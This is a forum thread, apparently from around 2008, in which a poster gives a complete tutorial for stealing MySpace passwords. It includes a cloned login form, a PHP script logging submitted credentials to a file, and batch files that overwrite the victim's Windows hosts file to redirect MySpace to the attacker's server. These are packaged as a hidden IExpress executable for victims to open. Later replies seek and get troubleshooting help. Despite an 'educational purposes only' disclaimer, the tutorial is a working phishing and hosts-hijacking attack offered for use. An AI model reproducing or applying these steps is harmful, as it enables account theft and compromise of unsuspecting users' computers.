rrdtool
Closed Thread
Page 1 of 4 123 ... LastLast

Thread: How To Get Myspace Passwords

How To Get Myspace Passwords

This tutorial gives you the ABILITY to obtain myspace passwords..before i continue i must state that i have no intensions of using my knowledge to actually get myspace passwords AND this tutorial is for EDUCATIONAL PURPOSES ONLY!! meaning if you do it and get in trouble, don't blame it on me, im only posting this tut so myspace can get a fix on this problem..

now that i have my disclaimer up i will begin the tutorial.

a brief discription of this tutorial combines my and m00nbats ideas (yes moonbat, your host file thing is involved so props for that). this will require for the "Target" to click on an .exe and after that, everything will go the way you want it to be.

ok your going to need a few things.

*. a server (don't worry its not as scary as it sounds, i will "provide" one for you)
    2. some batch file knowledge
    *.some HTML knowledge

ok, to explain what we are going to do, we will basicly tell the computer that when you type in "myspace.com" it will take them to your phishing site of myspace.com VIA ip address thus the name "hijacking" comes to play. in order to do this we will have to replace their host file with your modified version. and to cover our *****s of us being in that computer, we will delete everything we have added/modified. now to begin

first off we need to have a phishing site for myspace, so lets go to myspace.com. right click the page (anywhere) and click view source. we should get a bunch of lovely html sooo assuming your in notepad (if not copy and paste the code to notepad) we go to edit then find and we type in the find box
    Code:
     <form action
    (dont forget the "<") it should take us to a nice little string
    like so

Code:
    <form action="http://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
    so now we edit the code so that everything that goes in the form, appears in our server (aka your computer)

Code:
    <form action="login.php" method="get" id="LoginForm" name="aspnetForm">
    after you edit this save it as index.html on to your desktop

you may be wondering what login.php is, well we have to create that. the php should just have this

Code:
    <?php
    header("Location: http://home*4.myspace.com/index.cfm?fuseaction=user");
    $handle = fopen("out.txt", "a");
    foreach($_GET as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    all this does is it "retrieves" what ever things go in the html form you receive in a pretty out.txt and it also redirects them to the real site.

now that we have all of this set up, we begin to install our server. i personally use XAMPP just because i believe its pretty good and simple. you can get xampp [URL="http://www.apachefriends.org/en/xampp-windows.html"]HERE[/URL] and download the installer. make sure you select the three services when you install xampp =)

once youve done that just install everything and head to your installation directory (default is C:\xampp) once there go to htdocs and open up your internet browser.

in the address bar type in localhost and it should take you to a xampp page. if it doesn't then theres something wrong with your installation, if it does then delete everything in the htdocs and place index.html and login.php in the folder.

now re***** your web browser and you should see the magical myspace page, now just type anything in the username and password field and you should end up in the REAL myspace page. check your htdocs foder and there should be an out.txt with what you have put inside those field, this means IT WORKS so lets proceed on editing the host file in "C:\WINDOWS\system*2\drivers\etc" (etc is in fact a folder)

we now copy and paste it on to your desktop. close etc and open up notepad and open up the host file with notepad by just dragging and dropping the host file on to notepad. we should get something like this

Code:
    # Copyright (c) ****-**** Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      *02.54.*4.*7     rhino.acme.com          # source server
    #       *8.25.6*.*0     x.acme.com              # x client host

*27.0.0.*       localhost
    we will now add your ip and besides it, put myspace.com as many ways as possible so it would look like

Code:
    # Copyright (c) ****-**** Microsoft Corp.
    #
    # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
    #
    # This file contains the mappings of IP addresses to host names. Each
    # entry should be kept on an individual line. The IP address should
    # be placed in the first column followed by the corresponding host name.
    # The IP address and the host name should be separated by at least one
    # space.
    #
    # Additionally, comments (such as these) may be inserted on individual
    # lines or following the machine name denoted by a '#' symbol.
    #
    # For example:
    #
    #      *02.54.*4.*7     rhino.acme.com          # source server
    #       *8.25.6*.*0     x.acme.com              # x client host

*27.0.0.*       localhost
    *2.*4.56.7 myspace.com
    *2.*4.56.7 www.myspace.com
    *2.*4.56.7 http://myspace.com
    *2.*4.56.7 http://www.myspace.com
    *2.*4.56.7 myspace
    *2.*4.56.7 is your ip so if your ip address was 24.*0.78.7* then youd replace *2.*4.56.7 with 24.*0.78.7*. if you don't know what your ip address is, then goto whatismyip.com and it should tell you in big black letters what your ip address is. now save and exit the host file and open up notepad again. we will now inject notepad in to the target system so we will add this to our batch file
    Code:
    @echo off
    DEL C:\WINDOWS\system*2\drivers\etc\host
    MOVE "host" "C:\WINDOWS\system*2\drivers\etc"
    MOVE "stop.exe" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
    save this as start.bat and make it into and exe using the bat to exe converter found [URL="http://www.all-nettools.com/forum/showthread.php?t=6*0*"]HERE[/URL] at the end of the page.

we will now create the "stop.exe" which really is stop.bat converted into an exe file

Code:
    @echo off
    DEL C:\WINDOWS\system*2\drivers\etc\host
    DEL C:\Documents and Settings\All Users\Start Menu\Programs\Startup\stop.exe
    save it as stop.bat and convert it to exe.

now we should have
    host
    start.exe
    stop.exe

now we go to start->run->iexpress

now create a new self extraction then click next
    select extract and install (the first choice Buzzo) then next
    give it a good looking tiltle then next
    then no promt then next
    no license..next
    ah now we add our host, start.exe and stop.exe in to this wonderful white box and click next
    on the box that says install program select start.exe then next, we don't need anything for the bottom
    select hidden then next
    no message, next
    now check hide process animation from user and click browse to save it and give it a good name like above..next
    no restart, next
    don't save if you do then save i don't care, next
    then create the file and now you should have the file finished..all you have to do is get your victim to open it, and everytime they go to myspace, it will show your servers page instead and when they type in anything in those username and password fields, it will go to your out.txt.

have fun!!!
    keep in mind to always have your computer on or else your server wont work

REMEMBER THAT IF YOUR BEHIND A ROUTER, FORWARD PORT 80 TO YOUR COMPUTER!!!!!!!!!!!!!!!!!!!!!!!!
    Last edited by teknicalissue; 06-18-2009 at 11:54 PM.
    Yes..i do wear a grey hat... and don't plan on changing to white or black..

/me is looking forward to see how this turns out
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

sorry

sorry for the wait guys, ill have it up by tonight, i havent been getting much sleep lately..

lol trying to revive an old ***5 compaq computer so bare with me

enjoy

hope you all like it, if anything goes wrong, don't be afraid to post it up lol

Maybe this is due to my lack of knowledge, but how come the first line in batch files are DEL commands? Why are you deleting the files?
    "Workers of the world unite; you have nothing to lose but your chains." -Karl Marx

where?

on the stop.exe? or the start.exe
    on the stop, its because we don't want them going to our site EVERYDAY, so when they restart their computer "*********ly" everything goes back to normal

on the start, its because when you delete the host file, windows basicly stops using it and then when i move it, it begins using it again. bbbutttt

i found out that if you just replace the file without deleting it, for some reason it still runs..so for example if i just simply replace it, and i would type in myspace.com it would take us to the REAL myspace page for awhile till the system randomly loads up the file (this is on my xp system..don't know about the others) but if i where to delete it and replace it, it would then give us the web site instantaniusly

Ah, my bad. I forgot Windows restores certain files

tis cool

Unhappy can anyone help me with this?

I made the index.html file and the login.php file on notepad. I have installed xampp and when I type in localhost I was taken to an xampp page where I clicked english. This is where I have a problem. I delete all of the files in httdocs and put index.html and login.php into the folder. When I re***** my browser I am taken to a page that says

"Object not found!

The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again.

If you think this is a server error, please contact the web******.
    Error 404
    localhost
    02/08/08 **:56:56
    Apache/2.2.6 (Win*2) DAV/2 mod_ssl/2.2.6 OpenSSL/0.*.8g mod_autoindex_color PHP/5.2.5"

yea..

why not contact me VIA AIM?
    trying to fix something like this, is kinda hard in forums lol but anywho

make sure index.html and login.php is inside httdocs and not someother folder, also make sure that you named it index.html and not INDEX or Index, my computer has the same problem with capitalized letters, emm try restarting your computer also so you can reload the services from xampp.

I'm trying that right now. When I install xampp do I check all of the servers or just one?

Ummmm Can You Help Me Find The Password To My Myspace Account??please

any questions can be answered in my forum at cybernin.net =)
    Last edited by teknicalissue; 02-20-2008 at 03:42 PM.

What do i do when im done with every thing and i have my iexpress file. just get someone to open it. can i test if it works. bc i opened it and i still go strait to myspace page

im teknicalissue btw:
    you can test it out by asking a friend to type in his ip address in his browser. if it shows a myspace page... it works, if it doesn't, then open your ports.

Closed Thread